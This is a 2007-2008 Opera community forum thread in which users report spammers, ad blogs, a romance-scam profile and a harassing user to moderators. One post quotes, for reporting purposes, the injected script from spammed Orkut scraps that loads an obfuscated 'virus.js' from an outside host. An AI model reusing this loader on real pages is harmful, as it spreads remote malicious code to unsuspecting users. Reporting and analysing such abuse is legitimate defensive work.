Sunday, 16. December 2007, 20:05:54
Sunday, 16. December 2007, 20:32:47
Originally posted by infinity-1:
I am being spammed a lot by hqmusicvideo..
http://my.opera.com/community/forums/findpost.pl?id=2367990
Wednesday, 19. December 2007, 05:37:26
The script in question is hosted at his account's file archive:
http://files.myopera.com/virusdoorkut/files/virus.js
It has been packed (and therefore obfuscated) so it's a little hard to know how it works.
The part that is embedded in the scraps is readable, this is the part that loads the script hosted here at MyOpera:
<script type="text/javascript"> var flashWriter = new _SWFObject('http://www.orkut.com/LoL.aspx', '928560699', '1', '1', '9', '#FFFFFF', 'autohigh', '', '', '928560699'); flashWriter._addParam('wmode', 'transparent'); script=document.createElement('script');script.src='http://files.myopera.com/virusdoorkut/files/virus.js';document.getElementsByTagName('head')[0].appendChild(script);escape(''); flashWriter._addParam('allowNetworking', 'internal'); flashWriter._addParam('allowScriptAccess', 'never'); flashWriter._setAttribute('style', ''); flashWriter._write('flashDiv928560699');</script>
Orkut's staff have already taken care of the problem and deleted all of the spammed scraps, but the script is still hosted here at MyOpera, would be wise to terminate his account.
Wednesday, 26. December 2007, 04:38:46
THERE IS NO NUDE OR NON SECURE THINGS IN MY BLOG.
ANY ONE OF THE OPERA COMMUNITY PLEASE HELP ME....MY BLOG LINK IS
www.my.opera.com/venkateshnaidumy mail id is n99v99@gmail.complz help me friends and I promise to you that if there is any non secure things in my blog please point out them i will remove them....waiting for your reply venkateshnaidu
Quote | Edit | Quick QuoteReport post | Permalink
Monday, 31. December 2007, 21:26:31
http://files.myopera.com/anti-phpbb/files/index.html
Promising to hack phpBB.com
Sunday, 6. January 2008, 18:46:34
http://my.opera.com/liveonlinetv/blog
he added me as friend but when looking saw the ad for online television.
Sunday, 6. January 2008, 21:35:18
Saturday, 12. January 2008, 22:18:39
Monday, 14. January 2008, 05:21:18
Thursday, 24. January 2008, 13:07:49
It's in hungarian, but it's basically an Avon agent posting about new products (including prices). Has catalogs even. And annoying background music and an animated GIF for a background, but those are not against the ToS, sadly...
Thursday, 24. January 2008, 15:44:11
PS: Agree about the music
Thursday, 24. January 2008, 19:16:09
I didn't read the terms in a long while, but I keep seeing on the front page "There are millions of ways to blog, and we like them all", taken to mean "you can share your interests". Or?
Thursday, 24. January 2008, 20:45:00
If you're intending to make money off of My Opera (and you're not some sort of partner where you're also beneftting Opera), then you're violating the ToS. Why should they be providing hosting services to you for free?
I'd say that she is violating the ToS, but on the other hand if you know her I'd say you should probably see if you can get her to clean it up instead of me banning her. (I presume that her English might not be good enough for me to explain, though you'd know better than I ...)
Saturday, 9. February 2008, 17:16:31
Saturday, 9. February 2008, 17:25:02
Banned anyway, but use the right thread.
Wednesday, 13. February 2008, 01:40:41
a lot of Executive Dating, user with one blogpost which leads always to a page with the same design
http://my.opera.com/community/blogs/index.dml?&abc=E&page=136&skip=4050&show=az&perscreen=30
Wednesday, 13. February 2008, 14:00:21
it could help to run a script
user with 1 blogpost -> not logged in for 6 month -> kill
too many dead blogs are not the state of art
if you look at http://my.opera.com/community/blogs/?show=az
many testblogs with 1 post like "sdfgsdfg"
mostly uninteresting for visitors and after including rel=nofollow
also uninteresting for blogspammers
it could also be helpfull to start a-z with the most aktive users
and starting "a" by clicking "a"
Wednesday, 27. February 2008, 15:59:51
some guy added me his friend list without my permission, and he never ask anything for friendship!!!
his blog are full of porn photos!!! so i said him please delete me your friend list bcoz i don't want my avatar appearing his blog!!!
i said him againand again, and he reply me this comment:
"I think you are full of shit ! Why delete you .No i like you mwha love you babe .Show me your naked body
By witwax, # 27. February 2008, 15:41:01
and i wrote this:
i didn't like Your blog,and You didn't ask me for friendship.
i said PLEASE delete me your friends list... i don't wanna be Your friend!!
[ EDIT | DELETE ]
By ~Keilarina~, # 27. February 2008, 15:58:53
well, what can i do now? Moderators, hear my voice pls!
thanks
his link is http://my.opera.com/witwax/blog/
Wednesday, 27. February 2008, 16:21:48
Thursday, 28. February 2008, 16:48:29
http://my.opera.com/seraa4u/about/
My Dearest One!
Greetings to you, I hope this mail will find you well & healthy and I hope we can established a relationship since we are meeting here for the first time, I have gone through a profile that speaks good of you and I was impressed when i saw your profile at(opera.com) and decide to communicate with you. It is my desire to know you, I like honesty, trust, love, caring,truth,& respect, I have all this qulities in me,kindly respond to me through my private mail box (seraa404u8@yahoo.com) so we can know ourself 's better. I hope to read from you if your are also interested. Thanks and hoping to hear from you soonest.Please try to mail me through my e mail address so that i can send you my photo and also you send yours to me you know i am in love with you.miss seraa.
*email reported as spam as well.
My heterosexual self did chuckle though.
Thursday, 28. February 2008, 18:26:03
Monday, 3. March 2008, 20:09:25
i dont know if there just screwing around or what but hay to d*** bad for them DONT SPAM PEOPLE around me
legend_killer360 this is the a hole i found how is spaming
just give them a warning i dont need any more b.s. not after the sarah12 thing
Monday, 3. March 2008, 20:10:31
Monday, 3. March 2008, 22:57:51
We are aware of the group, but just because it is named "The Spammers" doesn't mean they've done anything here (but we are watching them).
Tuesday, 4. March 2008, 16:54:30
Not a spammer as such, but blog is basically one big ad for a restaurant which I believe is against rules.
Wednesday, 5. March 2008, 04:09:39
Wednesday, 5. March 2008, 22:41:05
I'm not sure this is correct forum, but I want to report that a spammer is sending emails that include the following links:
http://files.myopera.com/Gipso/blog/demo.htm
http://files.myopera.com/Mureeegrobc9/blog/demo.htm
http://files.myopera.com/prilRubi/blog/3demo.htm
http://files.myopera.com/VughSvge/blog/demo.htm
http://files.myopera.com/prilRubi/blog/3demo.htm
The 5 messages all arrived this morning from a known spammer (usually Canadian Pharmacy spam). Spammer has used "Googlepages" before, but this is first time I've seen "My Opera" to host the Spamvertised URLs. I not sure that this is "Blog Spam" or what.
Have I alerted the correct people by posting here?
Showing topic replies 1 - 50 of 1224.
Forums » Opera Community » Opera Community and other Opera services » Opera's Web sites: Feedback, questions and discussions
